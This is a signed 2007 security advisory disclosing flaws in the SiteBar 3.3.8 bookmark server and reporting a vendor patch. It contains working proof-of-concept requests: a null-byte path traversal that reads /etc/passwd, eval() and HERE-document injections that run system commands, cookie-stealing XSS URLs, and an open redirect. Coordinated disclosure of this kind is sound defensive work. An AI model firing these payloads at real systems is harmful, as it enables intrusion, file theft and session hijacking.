-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20071016)
Date: 16th October 2007
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: SiteBar 3.3.8 <http://www.sitebar.org/>
Vendor: Ondřej Brablc, David Szego and SiteBar Team <http://www.sitebar.org/>
Risk: High

Summary

This advisory comes in 4 related parts:

1) SiteBar application has single high risk issues with its translation
module.  It can can be made to retrieve any file to which the web server user
has read access.

2) SiteBar application has multiple high risk issues with its translation
module.  It can be made to execute arbitrary code to gain remote access
as the web server user typically nobody.

3) SiteBar application has multiple medium risk issues where it is vulnerable
to Javascript injection within the requested URL.

4) SiteBar application has single medium risk issue where it is vulnerable to
malicious redirects within the requested URL.

Technical Details

1) The SiteBar application translation module can be made to read any
arbitrary file that the web server user has read access to, as it makes
no sanity checks on the value passed within the dir parameter of the URL,
for example:

http://192.168.1.1/translator.php?dir=/etc/passwd%00

Note the use of %00 to terminate the malicious and so prevent the intended
string concatenation occuring.

2) The SiteBar application translation module can be forced into code
execution can occur in one of two ways.  Firstly, it makes no sanity checks
on the value passed within the edit parameter prior to using the value as
part of an eval() call, for example:

http://192.168.1.1/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22);

Secondly, whilst modifying strings within a translation, it makes no sanity
checks on the value passed for a given string to be embedded within a HERE
document within the languages strings library.  It is therefore possible to
terminate the HERE document and pass arbitrary code which will be executed
whenever the languages strings library is included, for example:

POST http://192.168.1.1/translator.php?lang=test&edit=text HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/translator.php?lang=test&edit=text
Cookie: SB3COOKIE=1; SB3AUTH=3efab8d1dc9a149d7d1d7866a33d2539
Content-Type: application/x-www-form-urlencoded
Content-length: 47497

dir=&label%5B0%5D=The+Bookmark+Server+for+Personal+and+Team+Use&md5%5B0%5D=823084516ae27478ec4c5fd40fb32ea8&value%5B0%5D=_P;

system('id');

?>

Note that _P terminates the HERE document.

3) The values of the URL requested are used in within the web pages returned
by the various scripts, in their unsanitised form.  Specifically, it makes
no sanity checks on the value passed within the multiple parameters of the
URL, for example:

http://192.168.1.1/integrator.php?lang="><script>alert('xss')</script> - Allows '
http://192.168.1.1/command.php?command=New+Password&uid=&token="><script>alert(document.cookie)</script> - Does not allow '
http://192.168.1.1/command.php?command=Folder%20Properties&nid_acl=%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '
http://192.168.1.1/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '
http://192.168.1.1/command.php?command='%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ', this one turned out to be CVE-2006-3320.
http://192.168.1.1/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - Allows '

Note that CVE-2006-3320 had not been resolved at the time of testing, in
September 2007, and so we included it in our vulnerability report to the vendor
for completeness.

4) Finally, the SiteBar can be made to redirect users to malicious locations,
as it makes no checks on the value passed within the forward parameter of the URL,
for example:

http://192.168.1.1/command.php?command=Log%20In&forward=http://www.google.com/

Solutions

Following vendor notification on the 27th September 2007, the vendor promptly
responded with an initial patch on the 7th October which has been attached along
with this advisory and which resolved the reported issues.  Nth Dimension would
recommend applying this patch as soon as possible.  Alternatively, from 3.3.9
(available at http://sitebar.org/downloads.php) onwards also include this patch.
Nth Dimension would like to thank Ondraj from the SiteBar team for the way he
worked to resolve the issue.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHFo3OVAlO5exu9x8RAhLWAJ0Vw4cessVBHnFMswYp6aDlmriDnwCfXpil
wyDF4P/iRQ5Ab7FqJFutWBA=
=Oqb/
-----END PGP SIGNATURE-----